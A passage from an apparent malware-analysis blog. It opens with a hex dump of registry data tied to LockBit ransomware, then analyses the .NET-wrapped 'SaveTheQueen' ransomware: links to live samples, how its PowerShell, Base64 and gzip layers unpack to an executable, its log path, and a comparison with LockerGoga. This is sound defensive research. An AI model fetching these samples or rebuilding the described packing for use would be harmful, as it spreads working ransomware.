class="n">AA</span> <span class="mi">10</span> <span class="mi">7</span><span class="n">E</span> <span class="mi">87</span> <span class="mi">89</span> <span class="n">FC</span> <span class="mi">70</span> <span class="n">FE</span> <span class="n">A3</span> <span class="mi">2</span><span class="n">B</span> <span class="mi">1</span><span class="n">E</span> <span class="n">FD</span> <span class="mi">5</span><span class="n">D</span> <span class="mi">95</span> <span class="n">E4</span> <span class="mi">57</span> <span class="n">EC</span> <span class="n">AA</span> <span class="mi">86</span> <span class="n">F8</span> <span class="n">B8</span> <span class="mi">63</span> <span class="mi">0</span><span class="n">D</span> <span class="n">A0</span> <span class="n">FE</span> <span class="n">C6</span> <span class="mi">88</span> <span class="mi">20</span> <span class="n">A1</span> <span class="n">AD</span> <span class="mi">2</span><span class="n">B</span> <span class="mi">12</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">52</span> <span class="mi">67</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">0</span><span class="n">A</span> <span class="n">FA</span> <span class="mi">42</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">99</span> <span class="n">CC</span> <span class="mi">46</span> <span class="n">F9</span> <span class="mi">44</span> <span class="n">DB</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">1</span><span class="n">B</span> <span class="n">A8</span> <span class="n">E6</span> <span class="mi">01</span> <span class="n">D2</span> <span class="n">D9</span> <span class="mi">1</span><span class="n">E</span> <span class="n">E2</span> <span class="n">C7</span> <span class="n">B6</span> <span class="mi">49</span>
<span class="mi">7</span><span class="n">F</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">7</span><span class="n">E</span> <span class="mi">84</span> <span class="mi">34</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">76</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">16</span> <span class="n">AA</span> <span class="n">D0</span> <span class="n">C5</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">22</span> <span class="mi">12</span> <span class="mi">44</span> <span class="mi">73</span> <span class="n">A7</span> <span class="mi">87</span> <span class="mi">16</span> <span class="mi">4</span><span class="n">B</span> <span class="n">DC</span> <span class="mi">5</span><span class="n">B</span> <span class="n">B3</span> <span class="n">CB</span> <span class="n">D3</span> <span class="n">CD</span> <span class="mi">07</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">66</span> <span class="mi">6</span><span class="n">F</span> <span class="mi">83</span> <span class="mi">08</span> <span class="n">B4</span> <span class="mi">13</span> <span class="mi">20</span> <span class="n">BF</span> <span class="mi">96</span> <span class="n">AB</span> <span class="n">B1</span> <span class="mi">64</span> <span class="mi">45</span> <span class="mi">43</span> <span class="n">EE</span> <span class="mi">10</span> <span class="mi">8</span><span class="n">A</span> <span class="n">F2</span> <span class="n">F8</span> <span class="mi">33</span> <span class="n">A9</span> <span class="mi">08</span> <span class="n">C0</span> <span class="n">D9</span> <span class="n">ED</span> <span class="mi">23</span> <span class="mi">7</span><span class="n">E</span> <span class="n">C3</span> <span class="mi">91</span> <span class="mi">02</span> <span class="n">D3</span> <span class="mi">21</span> <span class="n">B3</span> <span class="mi">70</span> <span class="n">B1</span> <span class="mi">82</span> <span class="n">ED</span> <span class="mi">42</span> <span class="mi">8</span><span class="n">E</span> <span class="mi">12</span> <span class="mi">83</span> <span class="mi">14</span> <span class="n">B2</span> <span class="mi">93</span> <span class="n">F8</span> <span class="mi">67</span> <span class="n">B9</span> <span class="mi">0</span><span class="n">D</span> <span class="n">AB</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">6</span><span class="n">E</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">35</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">72</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">57</span> <span class="mi">2</span><span class="k">C</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">57</span> <span class="mi">68</span> <span class="n">BF</span> <span class="mi">93</span> <span class="mi">37</span> <span class="mi">92</span> <span class="mi">7</span><span class="n">B</span> <span class="n">D3</span> <span class="mi">1</span><span class="n">D</span> <span class="mi">52</span> <span class="n">F0</span> <span class="mi">76</span> <span class="mi">36</span> <span class="mi">22</span> <span class="mi">29</span> <span class="n">AF</span> <span class="n">F5</span> <span class="mi">74</span> <span class="n">F0</span> <span class="mi">12</span> <span class="n">E0</span> <span class="mi">7</span><span class="k">C</span> <span class="mi">8</span><span class="n">B</span> <span class="n">A8</span> <span class="n">B6</span> <span class="n">BE</span> <span class="mi">59</span> <span class="n">F0</span> <span class="n">F3</span> <span class="mi">07</span> <span class="n">D8</span> <span class="n">EA</span> <span class="mi">67</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">47</span> <span class="mi">35</span> <span class="n">A6</span> <span class="n">B8</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">12</span> <span class="n">A4</span> <span class="n">BA</span> <span class="mi">99</span> <span class="mi">71</span> <span class="n">D6</span> <span class="mi">52</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">86</span> <span class="n">C9</span> <span class="mi">1</span><span class="n">F</span> <span class="n">C4</span> <span class="mi">89</span> <span class="n">AF</span> <span class="n">C6</span> <span class="mi">36</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">40</span> <span class="n">FC</span> <span class="n">EC</span> <span class="n">C7</span> <span class="mi">0</span><span class="n">F</span> <span class="mi">44</span> <span class="mi">59</span> <span class="n">EE</span> <span class="mi">51</span> <span class="n">D1</span> <span class="mi">44</span> <span class="mi">94</span> <span class="n">AD</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">4</span><span class="n">E</span> <span class="n">AF</span> <span class="n">DC</span> <span class="mi">90</span> <span class="n">CB</span> <span class="mi">30</span> <span class="n">D8</span> <span class="mi">2</span><span class="n">B</span> <span class="mi">36</span> <span class="n">A5</span> <span class="n">DE</span> <span class="mi">03</span> <span class="n">A6</span> <span class="n">FA</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">37</span> <span class="mi">26</span> <span class="n">FD</span> <span class="mi">5</span><span class="n">D</span> <span class="mi">89</span> <span class="n">C9</span> <span class="mi">93</span> <span class="mi">8</span><span class="n">A</span> <span class="n">B3</span> <span class="n">C6</span> <span class="n">D6</span> <span class="n">E2</span> <span class="mi">59</span> <span class="mi">2</span><span class="n">F</span> <span class="n">B2</span> <span class="mi">32</span> <span class="mi">13</span> <span class="n">B4</span> <span class="n">DF</span> <span class="mi">97</span> <span class="mi">95</span> <span class="n">D9</span> <span class="n">FD</span> <span class="mi">75</span> <span class="n">B6</span> <span class="mi">6</span><span class="n">E</span> <span class="n">F1</span> <span class="mi">4</span><span class="n">F</span> <span class="n">CA</span> <span class="n">A0</span> <span class="mi">79</span> <span class="n">EA</span> <span class="mi">32</span> <span class="mi">39</span> <span class="n">C0</span> <span class="mi">71</span> <span class="mi">33</span> <span class="mi">85</span> <span class="mi">06</span> <span class="n">D0</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">68</span> <span class="n">E8</span> <span class="n">B4</span> <span class="n">C1</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">13</span> <span class="mi">94</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">90</span> <span class="n">A4</span> <span class="mi">96</span> <span class="n">F5</span> <span class="mi">5</span><span class="n">E</span> <span class="n">A8</span> <span class="mi">66</span> <span class="mi">30</span> <span class="mi">6</span><span class="n">E</span> <span class="n">D5</span> <span class="n">F4</span> <span class="n">CC</span> <span class="mi">50</span> <span class="mi">60</span> <span class="n">F1</span> <span class="n">DB</span> <span class="mi">7</span><span class="n">D</span> <span class="n">C3</span> <span class="mi">91</span> <span class="n">C9</span> <span class="mi">77</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">96</span> <span class="n">BC</span> <span class="n">E4</span> <span class="mi">26</span> <span class="n">FE</span> <span class="mi">92</span> <span class="n">A2</span> <span class="n">F9</span> <span class="mi">83</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">13</span> <span class="mi">00</span> <span class="mi">2</span><span class="n">D</span> <span class="n">AD</span> <span class="n">DF</span> <span class="mi">0</span><span class="n">A</span> <span class="n">F2</span> <span class="n">C3</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">81</span> <span class="n">A9</span> <span class="mi">18</span> <span class="n">B8</span> <span class="mi">85</span> <span class="mi">1</span><span class="n">A</span> <span class="n">F4</span> <span class="mi">71</span> <span class="mi">1</span><span class="n">E</span> <span class="n">F0</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">3</span><span class="n">E</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">4</span><span class="k">C</span> <span class="mi">10</span> <span class="n">C9</span> <span class="n">F5</span> <span class="n">A8</span> <span class="mi">29</span> <span class="n">A2</span> <span class="mi">26</span> <span class="n">F6</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">2</span><span class="k">C</span> <span class="mi">60</span> <span class="n">F2</span> <span class="n">D0</span> <span class="mi">29</span> <span class="mi">48</span> <span class="mi">00</span> <span class="mi">4</span><span class="n">E</span> <span class="mi">8</span><span class="n">D</span> <span class="n">FB</span> <span class="n">E4</span> <span class="mi">31</span> <span class="n">D8</span> <span class="n">C7</span> <span class="n">A9</span> <span class="n">CD</span> <span class="n">A9</span> <span class="mi">6</span><span class="n">A</span> <span class="n">A5</span> <span class="mi">16</span> <span class="n">EC</span> <span class="n">A8</span> <span class="mi">44</span> <span class="mi">18</span> <span class="mi">00</span> <span class="mi">5</span><span class="n">E</span> <span class="n">FD</span> <span class="n">A3</span> <span class="mi">0</span><span class="n">E</span> <span class="n">F1</span> <span class="mi">48</span> <span class="mi">86</span> <span class="mi">2</span><span class="k">C</span> <span class="n">B3</span> <span class="mi">48</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">39</span> <span class="mi">15</span> <span class="mi">0</span>
<span class="mi">8</span> <span class="mi">39</span> <span class="mi">54</span> <span class="mi">9</span><span class="n">E</span> <span class="mi">95</span> <span class="mi">24</span> <span class="n">CD</span> <span class="n">AE</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">3</span><span class="k">C</span> <span class="n">E9</span> <span class="n">F2</span> <span class="mi">3</span><span class="n">D</span> <span class="n">BF</span> <span class="mi">3</span><span class="n">E</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">16</span> <span class="mi">52</span> <span class="n">C9</span> <span class="n">D8</span> <span class="n">B8</span> <span class="n">D9</span> <span class="n">DE</span> <span class="mi">5</span><span class="k">C</span> <span class="n">E5</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">91</span> <span class="n">C3</span> <span class="mi">7</span><span class="n">A</span> <span class="mi">98</span> <span class="n">DD</span> <span class="n">EC</span> <span class="mi">67</span> <span class="mi">65</span> <span class="mi">16</span> <span class="mi">71</span> <span class="mi">68</span> <span class="mi">51</span> <span class="mi">12</span> <span class="mi">89</span> <span class="n">F4</span> <span class="mi">5</span><span class="n">E</span> <span class="n">B9</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">52</span> <span class="mi">10</span> <span class="mi">82</span> <span class="mi">37</span> <span class="mi">48</span> <span class="n">C7</span> <span class="n">B5</span> <span class="n">D0</span> <span class="n">FA</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">85</span> <span class="mi">2</span><span class="n">B</span> <span class="n">A1</span> <span class="mi">5</span><span class="n">E</span> <span class="n">C0</span> <span class="n">E3</span> <span class="mi">6</span><span class="n">D</span> <span class="n">D8</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">74</span> <span class="n">DE</span> <span class="n">B7</span> <span class="mi">03</span> <span class="n">FF</span> <span class="mi">94</span> <span class="mi">38</span> <span class="n">C7</span> <span class="n">A0</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">3</span><span class="n">B</span> <span class="n">E0</span> <span class="n">CE</span> <span class="n">F2</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">01</span> <span class="mi">0</span><span class="n">B</span> <span class="mi">67</span> <span class="mi">82</span> <span class="n">BE</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">9</span><span class="n">D</span> <span class="mi">11</span> <span class="mi">99</span> <span class="mi">40</span> <span class="n">C3</span> <span class="mi">85</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">97</span> <span class="mi">74</span> <span class="n">B1</span> <span class="n">EB</span> <span class="mi">67</span> <span class="mi">16</span> <span class="mi">42</span> <span class="n">BB</span> <span class="n">FF</span> <span class="mi">25</span> <span class="mi">71</span> <span class="mi">09</span> <span class="mi">38</span> <span class="n">A1</span> <span class="mi">4</span><span class="n">E</span> <span class="n">E8</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">4</span><span class="n">D</span> <span class="n">F0</span> <span class="n">E8</span> <span class="mi">63</span> <span class="n">CA</span> <span class="n">EC</span> <span class="n">E1</span> <span class="mi">35</span> <span class="n">FF</span> <span class="mi">26</span> <span class="mi">08</span> <span class="n">DE</span> <span class="n">A9</span> <span class="n">A5</span> <span class="mi">70</span> <span class="mi">29</span> <span class="mi">57</span> <span class="n">D1</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">04</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">5</span><span class="n">F</span> <span class="n">CE</span> <span class="mi">36</span> <span class="mi">83</span> <span class="mi">4</span><span class="n">B</span> <span class="mi">21</span> <span class="mi">3</span><span class="k">C</span> <span class="n">D4</span> <span class="n">CE</span> <span class="mi">01</span> <span class="n">D0</span> <span class="mi">83</span> <span class="n">EF</span> <span class="n">EC</span> <span class="n">D0</span> <span class="n">F5</span> <span class="mi">26</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">47</span> <span class="mi">68</span> <span class="mi">08</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">46</span> <span class="n">D1</span> <span class="mi">74</span> <span class="n">E6</span> <span class="n">E3</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">8</span><span class="n">B</span> <span class="n">FB</span> <span class="mi">73</span> <span class="n">E2</span> <span class="n">C4</span> <span class="n">D9</span> <span class="n">C6</span> <span class="n">E0</span> <span class="mi">24</span> <span class="mi">67</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">62</span> <span class="mi">44</span> <span class="mi">79</span> <span class="mi">70</span> <span class="mi">92</span> <span class="n">C3</span> <span class="n">AB</span> <span class="mi">96</span> <span class="mi">00</span> <span class="mi">8</span><span class="n">E</span> <span class="n">E6</span> <span class="mi">68</span> <span class="mi">33</span> <span class="mi">9</span><span class="n">D</span> <span class="mi">7</span><span class="k">C</span> <span class="n">C2</span> <span class="mi">83</span> <span class="n">AB</span> <span class="mi">77</span> <span class="n">B2</span> <span class="mi">6</span><span class="n">B</span> <span class="n">CC</span> <span class="n">C7</span> <span class="mi">4</span><span class="n">B</span> <span class="mi">61</span> <span class="mi">2</span><span class="n">E</span> <span class="mi">81</span> <span class="mi">30</span> <span class="n">C8</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">71</span> <span class="mi">63</span> <span class="mi">18</span> <span class="n">DB</span> <span class="n">C0</span> <span class="mi">65</span> <span class="n">A9</span> <span class="mi">5</span><span class="k">C</span> <span class="n">E9</span> <span class="n">FA</span> <span class="mi">81</span> <span class="mi">0</span><span class="n">E</span> <span class="n">AC</span> <span class="n">D5</span> <span class="n">C2</span> <span class="n">BB</span> <span class="n">F8</span> <span class="mi">3</span><span class="n">B</span> <span class="mi">70</span> <span class="mi">02</span> <span class="mi">88</span> <span class="n">E5</span> <span class="mi">35</span> <span class="mi">0</span><span class="n">B</span> <span class="n">DE</span> <span class="mi">01</span> <span class="n">B2</span> <span class="mi">32</span> <span class="n">D6</span> <span class="n">B5</span> <span class="n">F2</span> <span class="mi">41</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">31</span> <span class="mi">82</span> <span class="mi">5</span><span class="n">F</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">78</span> <span class="n">AF</span> <span class="n">A2</span> <span class="mi">16</span> <span class="n">F8</span> <span class="mi">88</span> <span class="n">E8</span> <span class="mi">85</span> <span class="mi">6</span><span class="n">F</span> <span class="n">CD</span> <span class="mi">48</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">02</span> <span class="n">C6</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">10</span> <span class="mi">5</span><span class="n">E</span> <span class="n">B3</span> <span class="n">A4</span> <span class="mi">80</span> <span class="n">BD</span> <span class="n">E1</span> <span class="mi">99</span> <span class="mi">3</span><span class="n">F</span> <span class="n">FA</span> <span class="mi">07</span> <span class="mi">63</span> <span class="mi">2</span><span class="n">B</span> <span class="n">FC</span> <span class="n">B0</span> <span class="mi">19</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">27</span> <span class="n">D4</span> <span class="mi">3</span><span class="n">D</span> <span class="n">D5</span> <span class="n">E5</span> <span class="mi">5</span><span class="k">C</span> <span class="n">D9</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">7</span><span class="n">D</span> <span class="n">D4</span> <span class="n">B6</span> <span class="mi">06</span> <span class="n">A6</span> <span class="mi">31</span> <span class="mi">43</span> <span class="n">FD</span> <span class="mi">4</span><span class="n">A</span> <span class="mi">70</span> <span class="mi">22</span> <span class="n">A7</span> <span class="n">D1</span> <span class="mi">01</span> <span class="n">DA</span> <span class="mi">23</span> <span class="n">E2</span> <span class="mi">98</span> <span class="mi">89</span> <span class="mi">12</span> <span class="mi">07</span> <span class="n">C2</span> <span class="mi">79</span> <span class="n">BA</span> <span class="mi">6</span><span class="n">A</span> <span class="n">F5</span> <span class="mi">04</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">84</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">LockBit</span><span class="err">\</span><span class="k">Public</span><span class="p">:</span> <span class="n">DC</span> <span class="n">BD</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">75</span> <span class="n">EE</span> <span class="mi">01</span> <span class="n">DA</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">88</span> <span class="mi">1</span><span class="k">C</span> <span class="n">D8</span> <span class="n">B0</span> <span class="n">FC</span> <span class="n">B8</span> <span class="n">F8</span> <span class="mi">7</span><span class="n">D</span> <span class="mi">2</span><span class="k">C</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">0</span><span class="n">A</span> <span class="n">F0</span> <span class="mi">37</span> <span class="n">C8</span> <span class="mi">64</span> <span class="mi">06</span> <span class="mi">32</span> <span class="n">D0</span> <span class="mi">02</span> <span class="mi">70</span> <span class="n">BB</span> <span class="mi">60</span> <span class="n">D8</span> <span class="mi">55</span> <span class="n">D9</span> <span class="n">F3</span> <span class="mi">53</span> <span class="n">E6</span> <span class="n">AB</span> <span class="mi">4</span><span class="n">D</span> <span class="mi">34</span> <span class="n">F3</span> <span class="mi">35</span> <span class="n">B2</span> <span class="mi">0</span><span class="n">D</span> <span class="n">AE</span> <span class="n">DB</span> <span class="mi">62</span> <span class="n">AB</span> <span class="mi">24</span> <span class="mi">5</span><span class="n">A</span> <span class="n">BB</span> <span class="mi">3</span><span class="n">A</span> <span class="n">EB</span> <span class="mi">74</span> <span class="n">EF</span> <span class="n">DD</span> <span class="n">BA</span> <span class="n">D1</span> <span class="mi">23</span> <span class="n">EE</span> <span class="n">DA</span> <span class="mi">14</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">30</span> <span class="mi">20</span> <span class="mi">34</span> <span class="n">A4</span> <span class="mi">33</span> <span class="mi">06</span> <span class="n">A8</span> <span class="n">B9</span> <span class="n">D8</span> <span class="mi">26</span> <span class="n">A6</span> <span class="n">C6</span> <span class="mi">93</span> <span class="n">D1</span> <span class="mi">66</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">51</span> <span class="n">AF</span> <span class="mi">8</span><span class="n">D</span> <span class="mi">0</span><span class="n">D</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">6</span><span class="n">D</span> <span class="n">D3</span> <span class="n">F8</span> <span class="mi">01</span> <span class="n">A3</span> <span class="n">CB</span> <span class="mi">63</span> <span class="n">BC</span> <span class="mi">04</span> <span class="mi">84</span> <span class="mi">70</span> <span class="mi">42</span> <span class="n">C4</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">75</span> <span class="mi">7</span><span class="n">B</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">33</span> <span class="mi">59</span> <span class="n">A5</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">29</span> <span class="mi">75</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">8</span><span class="n">B</span> <span class="mi">50</span> <span class="mi">18</span> <span class="n">D0</span> <span class="n">EC</span> <span class="mi">69</span> <span class="mi">93</span> <span class="mi">9</span><span class="n">F</span> <span class="mi">84</span> <span class="mi">5</span><span class="k">C</span> <span class="n">D7</span> <span class="mi">58</span> <span class="mi">75</span> <span class="mi">29</span> <span class="mi">1</span><span class="k">C</span> <span class="mi">79</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">61</span> <span class="mi">5</span><span class="k">C</span> <span class="mi">8</span><span class="k">C</span> <span class="mi">72</span> <span class="mi">69</span> <span class="n">D8</span> <span class="mi">2</span><span class="n">A</span> <span class="n">A6</span> <span class="mi">47</span> <span class="mi">7</span><span class="n">D</span> <span class="n">BC</span> <span class="mi">9</span><span class="n">B</span> <span class="mi">86</span> <span class="mi">74</span> <span class="mi">0</span><span class="k">C</span> <span class="n">DD</span> <span class="n">F8</span> <span class="mi">25</span> <span class="n">E7</span> <span class="mi">82</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">3</span><span class="k">C</span> <span class="mi">1</span><span class="n">A</span> <span class="mi">68</span> <span class="n">CD</span> <span class="mi">8</span><span class="n">F</span> <span class="n">A5</span> <span class="n">D6</span> <span class="mi">3</span><span class="n">A</span> <span class="mi">17</span> <span class="mi">8</span><span class="n">A</span> <span class="n">E2</span> <span class="mi">43</span> <span class="mi">2</span><span class="n">A</span> <span class="mi">20</span> <span class="n">C6</span> <span class="n">F8</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">34</span> <span class="mi">25</span> <span class="n">B6</span> <span class="n">E7</span> <span class="n">CA</span> <span class="mi">82</span> <span class="mi">05</span> <span class="mi">1</span><span class="n">B</span> <span class="n">E0</span> <span class="n">A2</span> <span class="n">D4</span> <span class="n">FB</span> <span class="n">C2</span> <span class="n">EA</span> <span class="n">AC</span> <span class="mi">55</span> <span class="mi">10</span> <span class="mi">6</span><span class="k">C</span> <span class="mi">07</span> <span class="mi">7</span><span class="n">F</span> <span class="mi">47</span> <span class="mi">21</span> <span class="mi">05</span> <span class="mi">0</span><span class="n">A</span> <span class="mi">41</span> <span class="n">A2</span> <span class="n">AF</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">98</span> <span class="mi">1</span><span class="n">E</span> <span class="mi">60</span> <span class="mi">6</span><span class="n">B</span> <span class="mi">0</span><span class="n">E</span> <span class="n">F2</span> <span class="mi">0</span><span class="n">A</span> <span class="n">EC</span> <span class="mi">9</span><span class="n">B</span> <span class="n">A6</span> <span class="mi">6</span><span class="n">D</span> <span class="mi">01</span> <span class="n">CE</span> <span class="n">CA</span> <span class="n">FF</span> <span class="mi">16</span> <span class="n">EB</span> <span class="mi">4</span><span class="k">C</span> <span class="n">C0</span> <span class="mi">2</span><span class="n">F</span> <span class="mi">28</span> <span class="mi">6</span><span class="n">E</span> <span class="n">B2</span> <span class="mi">7</span><span class="n">B</span> <span class="n">AA</span> <span class="n">B4</span> <span class="mi">02</span> <span class="mi">1</span><span class="n">F</span> <span class="mi">21</span> <span class="n">FD</span> <span class="mi">5</span><span class="n">A</span> <span class="mi">5</span><span class="n">B</span> <span class="mi">9</span><span class="k">C</span> <span class="mi">6</span><span class="n">B</span> <span class="n">B5</span> <span class="n">E0</span> <span class="n">BE</span> <span class="n">E0</span> <span class="mi">05</span> <span class="mi">50</span> <span class="mi">3</span><span class="n">D</span> <span class="mi">3</span><span class="n">F</span> <span class="mi">4</span><span class="n">F</span> <span class="mi">5</span><span class="k">C</span> <span class="n">FE</span> <span class="mi">73</span> <span class="n">EF</span> <span class="mi">2</span><span class="n">D</span> <span class="mi">1</span><span class="n">B</span> <span class="mi">34</span> <span class="mi">51</span> <span class="n">FB</span> <span class="n">C1</span> <span class="n">AA</span> <span class="n">CB</span> <span class="mi">9</span><span class="n">D</span> <span class="n">F6</span> <span class="mi">9</span><span class="n">E</span> <span class="n">BC</span> <span class="mi">14</span> <span class="mi">97</span> <span class="n">FC</span> <span class="n">B2</span> <span class="n">B1</span> <span class="mi">01</span> <span class="mi">00</span> <span class="mi">01</span>
</pre></div>
<p></br></p>God save the Queen [...] 'cause Ransom is money - SaveTheQueen Encryptor2019-12-02T00:00:00+01:002019-12-02T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-12-02:/god-save-the-queen-cause-ransom-is-money-savethequeen-encryptor.html<p>Honestly I couldn't decide between the title above and "All crimes are paid", but Sex Pistols fans will get it regardless Β―\<em>(γ)</em>/Β―</p><p>I found this sample while browsing the new public submissions on AnyRun on the 1st of December. It peaked my interest because there were just three samples of it on the platform at the time of writing this and they were all uploaded very recently.</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/queen-logo.png"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>SaveTheQueen @ <a href="https://app.any.run/tasks/2821049e-3bc8-4225-8ef7-ae9fde3d576b/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded/5ddc1e8586b8c95ec2571896">HybridAnalysis</a>
--> <code>sha256 3c9f777654a45eb6219f12c2ad10082043814389a4504c27e5aec752a8ee4ded</code></p>
<p></br></p>
<p>As always one of my go to tools is DetectItEasy. In this case it tells us that we are dealing with a .NET Application and you know what that means: Let's whip out the .NET Analysis VM and take a look.</p>
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/queen-die.png"></center></p>
<p></br></p>
<p>This looks pretty promising. Because .NET Code is not compiled to Machine Language directly but rather to the Common Intermediate Language (CIL) just in time we can inspect it without the need for a disassembler with <a href="https://www.telerik.com/products/decompiler.aspx">Telerik JustDecompile</a> or <a href="https://github.com/0xd4d/dnSpy">dnSpy</a>.</p>
<p><center><img alt="Sidebar of JustDecompile" src="https://dissectingmalwa.re/img/queen-justdecompile.png"></center></p>
<p></br></p>
<p>Looking at the Output it looks like we have a Powershell Script in front of us that has been run through <a href="https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1">PS2EXE</a>, a kind of "converter" (a wrapper to be more precise) for ps1 scripts to PE executables.</p>
<p><center><img alt="The Base64 encoded string" src="https://dissectingmalwa.re/img/queen-string.png"></center></p>
<p></br></p>
<p>Decoding the Base64 string we got from the binary gets us two more blocks of what looks like base64 strings and a few lines of PowerShell code between it.</p>
<p><center><img alt="Extracted Base64" src="https://dissectingmalwa.re/img/queen-base64ps.png"></center></p>
<p></br></p>
<p>Decompressing one of the gzip blocks yields us a Portable Executable!</p>
<p><center><img alt="Decompressing the Code" src="https://dissectingmalwa.re/img/queen-gzipdecomp.png"></center></p>
<p>The dropped <em>.SaveTheQueen.LOG</em> was found in <strong>C:\ProgramData\</strong>. SaveTheQueen <strong>does not</strong> leave a ransomnote or other information to contact the crooks.</p>
<div class="highlight"><pre><span></span><span class="n">CLR</span><span class="o">:</span> <span class="mf">2.0</span><span class="o">.</span><span class="mf">50727.5420</span>
<span class="n">Drive</span><span class="o">:</span> <span class="n">C</span><span class="o">:\</span>
</pre></div>
<p><br/></p>
<p>Because the Registry edits resemble something seen before in <a href="https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/what-you-need-to-know-about-the-lockergoga-ransomware">LockerGoga</a> I'd like to make a short comparison between the two stains.</p>
<table>
<thead>
<tr>
<th align="center">"Feature"</th>
<th align="center"></th>
<th align="center">SaveTheQueen</th>
<th align="center"></th>
<th align="center">LockerGoga</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center"><em>Ransomnote</em></td>
<td align="center"></td>
<td align="center">none</td>
<td align="center"></td>
<td align="center">txt File in %Desktop%</td>
</tr>
<tr>
<td align="center"><em>Logging</em></td>
<td align="center"></td>
<td align="center">C:\ProgramData\SaveTheQueen.LOG</td>
<td align="center"></td>
<td align="center">C:\.log</td>
</tr>
<tr>
<td align="center"><em>Registry</em></td>
<td align="center"></td>
<td align="center">Restartmanager\Session00xx</td>
<td align="center"></td>
<td align="center">Restartmanager\Session00xx</td>
</tr>
<tr>
<td align="center"><em>Binary</em></td>
<td align="center"></td>
<td align="center">.NET</td>
<td align="center"></td>
<td align="center">Visual C++</td>
</tr>
</tbody>
</table>
<p></br>
</br></p>
<h3><strong>Update 19.12.2019:</strong></h3>
<p>A new variant of the SaveTheQueen Ransomware was found the MalwareHunterTeam. I'll update this article asap.</p>
<p></br></p>
